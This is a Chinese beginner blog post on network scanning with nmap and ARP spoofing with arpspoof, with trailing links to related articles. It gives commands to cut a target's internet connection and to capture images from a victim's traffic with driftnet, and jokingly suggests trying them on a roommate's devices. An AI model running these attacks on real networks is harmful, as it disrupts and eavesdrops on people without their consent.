文中可能存在错误操作或错误理解,望大家不吝指正.

同时也希望可以帮助到想要学习接触此方面、或兴趣使然的你,让你有个大概的印象.

!阅前须知!

本文是基于我几年前的一本笔记本,上面记录了我学习网络基础时的部分笔记.

本文中的工具可能已经过时,或使用方法已经改变了,感兴趣可以深入查阅资料

(但是我还是列出以前的使用方法供大家借鉴).

ps.若对无线攻击手段WiFi破解感兴趣可以参考以下两篇文章

【无线安全实践入门】基础攻击手段与常用工具简介

【无线安全实践入门】破解WiFi密码的多个方法

ps.本文环境在Kali下,学习最好具备一点linux基础知识.

1.网络扫描和嗅探

NMap(Network Mapper),一个很不错的网络扫描和嗅探工具包

--NMap真的很常用,简直神器

--列出几种简单的使用方法:

--ping扫描,快速,不过回显的内容有限

> nmap -sP (网关IP)/(子网掩码)

--SYN/半开放扫描,加上-A回显详细信息

> nmap -sS [-A] (网关IP)/(子网掩码)

--单个扫描,显示详细内容

> nmap -A (目标IP)

--示例

> nmap -sP 192.168.1.1/24

2.ARP欺骗

局域网中的ARP欺骗还是比较有意思的.像arpspoofEttercap等工具都很不错.

arp欺骗之后其实可以很多动作的...

这里就介绍老掉牙的arpspoof的断网攻击和图片捕获.

ps.有条件的话,可以拿手机或者室友电脑练手(doge脸).

--首先,在局域网环境中配合NMap工具使用,取得目标IP

> nmap -sP (网关IP)/(子网掩码)

2.1.断网攻击

ps.修改ip_forward的值,是为了开启IP转发,其值为'0'时候则禁止转发,目标主机断网.

--修改ip_forward(默认为'0')

--可以提前cat查看一下,若是回显'0',则可以跳过本步

> echo 0 > /proc/sys/net/ipv4/ip_forward 

--开始arp欺骗

> arpspoof -i (你的网卡名称) -t (目标IP) (网关IP)

--使用目标主机上网测试,观察命令行回显.

2.2.图片捕获

--修改ip_forward(默认为'0')

--可以提前cat查看一下,若是回显'1',则可以跳过本步

> echo 1 > /proc/sys/net/ipv4/ip_forward 

--开始arp欺骗(本机网卡名,可以用ifconfig来查看)

> arpspoof -i (本机网卡名) -t (目标IP) (网关IP)

--另外再开一终端,开始抓取图片

> drifnet -i (本机网卡名)

--使用目标主机上网看图片,观察弹出的窗口回显图片,观察命令行回显.

常见的网络协议是网络安全中的基础,能让你能够更快吸收了解技术细节.

加油,共勉

【无线安全实践入门】网络扫描和ARP欺骗的更多相关文章

  1. 【无线安全实践入门】破解WiFi密码的多个方法

    本文希望可以帮助到想要学习接触此方面.或兴趣使然的你,让你有个大概的印象. 文中可能存在错误操作或错误理解,望大家不吝指正. !阅前须知! 本文是基于我几年前的一本笔记本,上面记录了我学习网络基础时的 ...

  2. python scapy的用法之ARP主机扫描和ARP欺骗

    python scapy的用法之ARP主机扫描和ARP欺骗 目录: 1.scapy介绍 2.安装scapy 3.scapy常用 4.ARP主机扫描 5.ARP欺骗 一.scapy介绍 scapy是一个 ...

  3. 第三节课:简单的网络命令和ARP欺骗

    MTU :最大传输单元 RX:收包 TX:   发包 Ifconfig: IP配置命令,config是linux中用于显示或配置网络设备(网络接口卡)的命令 ifconfig eth0 192.168 ...

  4. 【网络编程3】网络编程基础-arp请求(局域网主机扫描)

    ARP协议 ARP(Add ress Resolution Protocol)地址解析协议位于数据链路层,是根据IP地址获取MAC地址的一个协议. ARP 查看指令 arp -a 显示所有接口的当前A ...

  5. 基于ARP的网络扫描工具netdiscover

    基于ARP的网络扫描工具netdiscover   ARP是将IP地址转化物理地址的网络协议.通过该协议,可以判断某个IP地址是否被使用,从而发现网络中存活的主机.Kali Linux提供的netdi ...

  6. 常用网络工具 ipconfig arp traceroute

    如今的计算机是离不开网络的计算机了,因而我们对网络要有一基础的认识.连不上网,程序运行不正常之类的,多少都与网络有关.本文将介绍常用的工具. 网络出问题 ipconfig ping 网络连不上,首先要 ...

  7. 网络扫描工具nmap

    nmap一般就用来扫描主机是否在线(特别是扫描局域网内存活的机器).开放了哪些端口.其他的功能用的比较少,做渗透的人可能要了解的多些. 1.1 选项说明 nmap需要自行安装. shell> y ...

  8. OpenStack实践系列⑤网络服务Neutron

    OpenStack实践系列⑤网络服务Neutron 3.8 Neturn 服务部署 注册neutron服务 [root@node1 ~]# source admin-openrc.sh [root@n ...

  9. 网络扫描信息收集基于(Windows)

    1.首先说明一下一款网络扫描工具,在之前的博客中我曾简要的写过关于Advance IP Scanner使用方法,最近要写网络扫描的工具,所以对这款工具做一个详细的功能细节上的介绍. 如下图  在输入框 ...

随机推荐

  1. WPF Path.Data 后台代码赋值

    Path path = new Path(); string sData = "M 250,40 L200,20 L200,60 Z"; var converter = TypeD ...

  2. MVC 调试路由

    1.添加引用RouteDebug.dll 2 修改Global.asax,切记调试过后要删掉 using System;using System.Collections.Generic;using S ...

  3. C# WindowsPrincipal(Windows规则)的使用

    using System;using System.Collections.Generic;using System.Linq;using System.Security.Principal;usin ...

  4. C++杂记:运行时类型识别(RTTI)与动态类型转换原理

    运行时类型识别(RTTI)的引入有三个作用: 配合typeid操作符的实现: 实现异常处理中catch的匹配过程: 实现动态类型转换dynamic_cast. 1. typeid操作符的实现 1.1. ...

  5. SqlServer删除复制监视器中无效的发布名称

    原文:SqlServer删除复制监视器中无效的发布名称 在服务器复制监视器中有一个发布名称,因为该发布订阅已经删除. ReportServerTempDB只有一个发布,已无效,打算删除. --直接删除 ...

  6. ARTS 12.10 - 12.14

    从陈皓博主的专栏里学到一个概念,争取可以坚持下去: 我在我的读者群中推荐出 ARTS 的任务,每个人每周一个 Algorithm,Review 一篇英文文章,总结一个工作中的技术 Tip,以及 Sha ...

  7. 自定义View相关的博客收藏

    颜色: http://android.jobbole.com/83283/ 坐标: http://android.jobbole.com/83276/ 流程介绍: http://android.job ...

  8. win10应用开发——如何判断应用是在手机上运行还是电脑上运行

    原文:win10应用开发--如何判断应用是在手机上运行还是电脑上运行 在进行uwp应用开发的时候, 有时我们需要知道自己的应用是在手机端运行还是在桌面端运行,那么通过以下的api就可以进行判断: Wi ...

  9. Caliburn.Micro 自定义View和ViewModel的匹配规则

    使用TypeMappingConfiguration类 //Override the default subnamespaces var config = new TypeMappingConfigu ...

  10. ASP.NET Core Linux 发布

    这篇博客参考了以下文章: 1.http://www.cnblogs.com/ants/p/5732337.html 2.http://www.linuxidc.com/Linux/2016-11/13 ...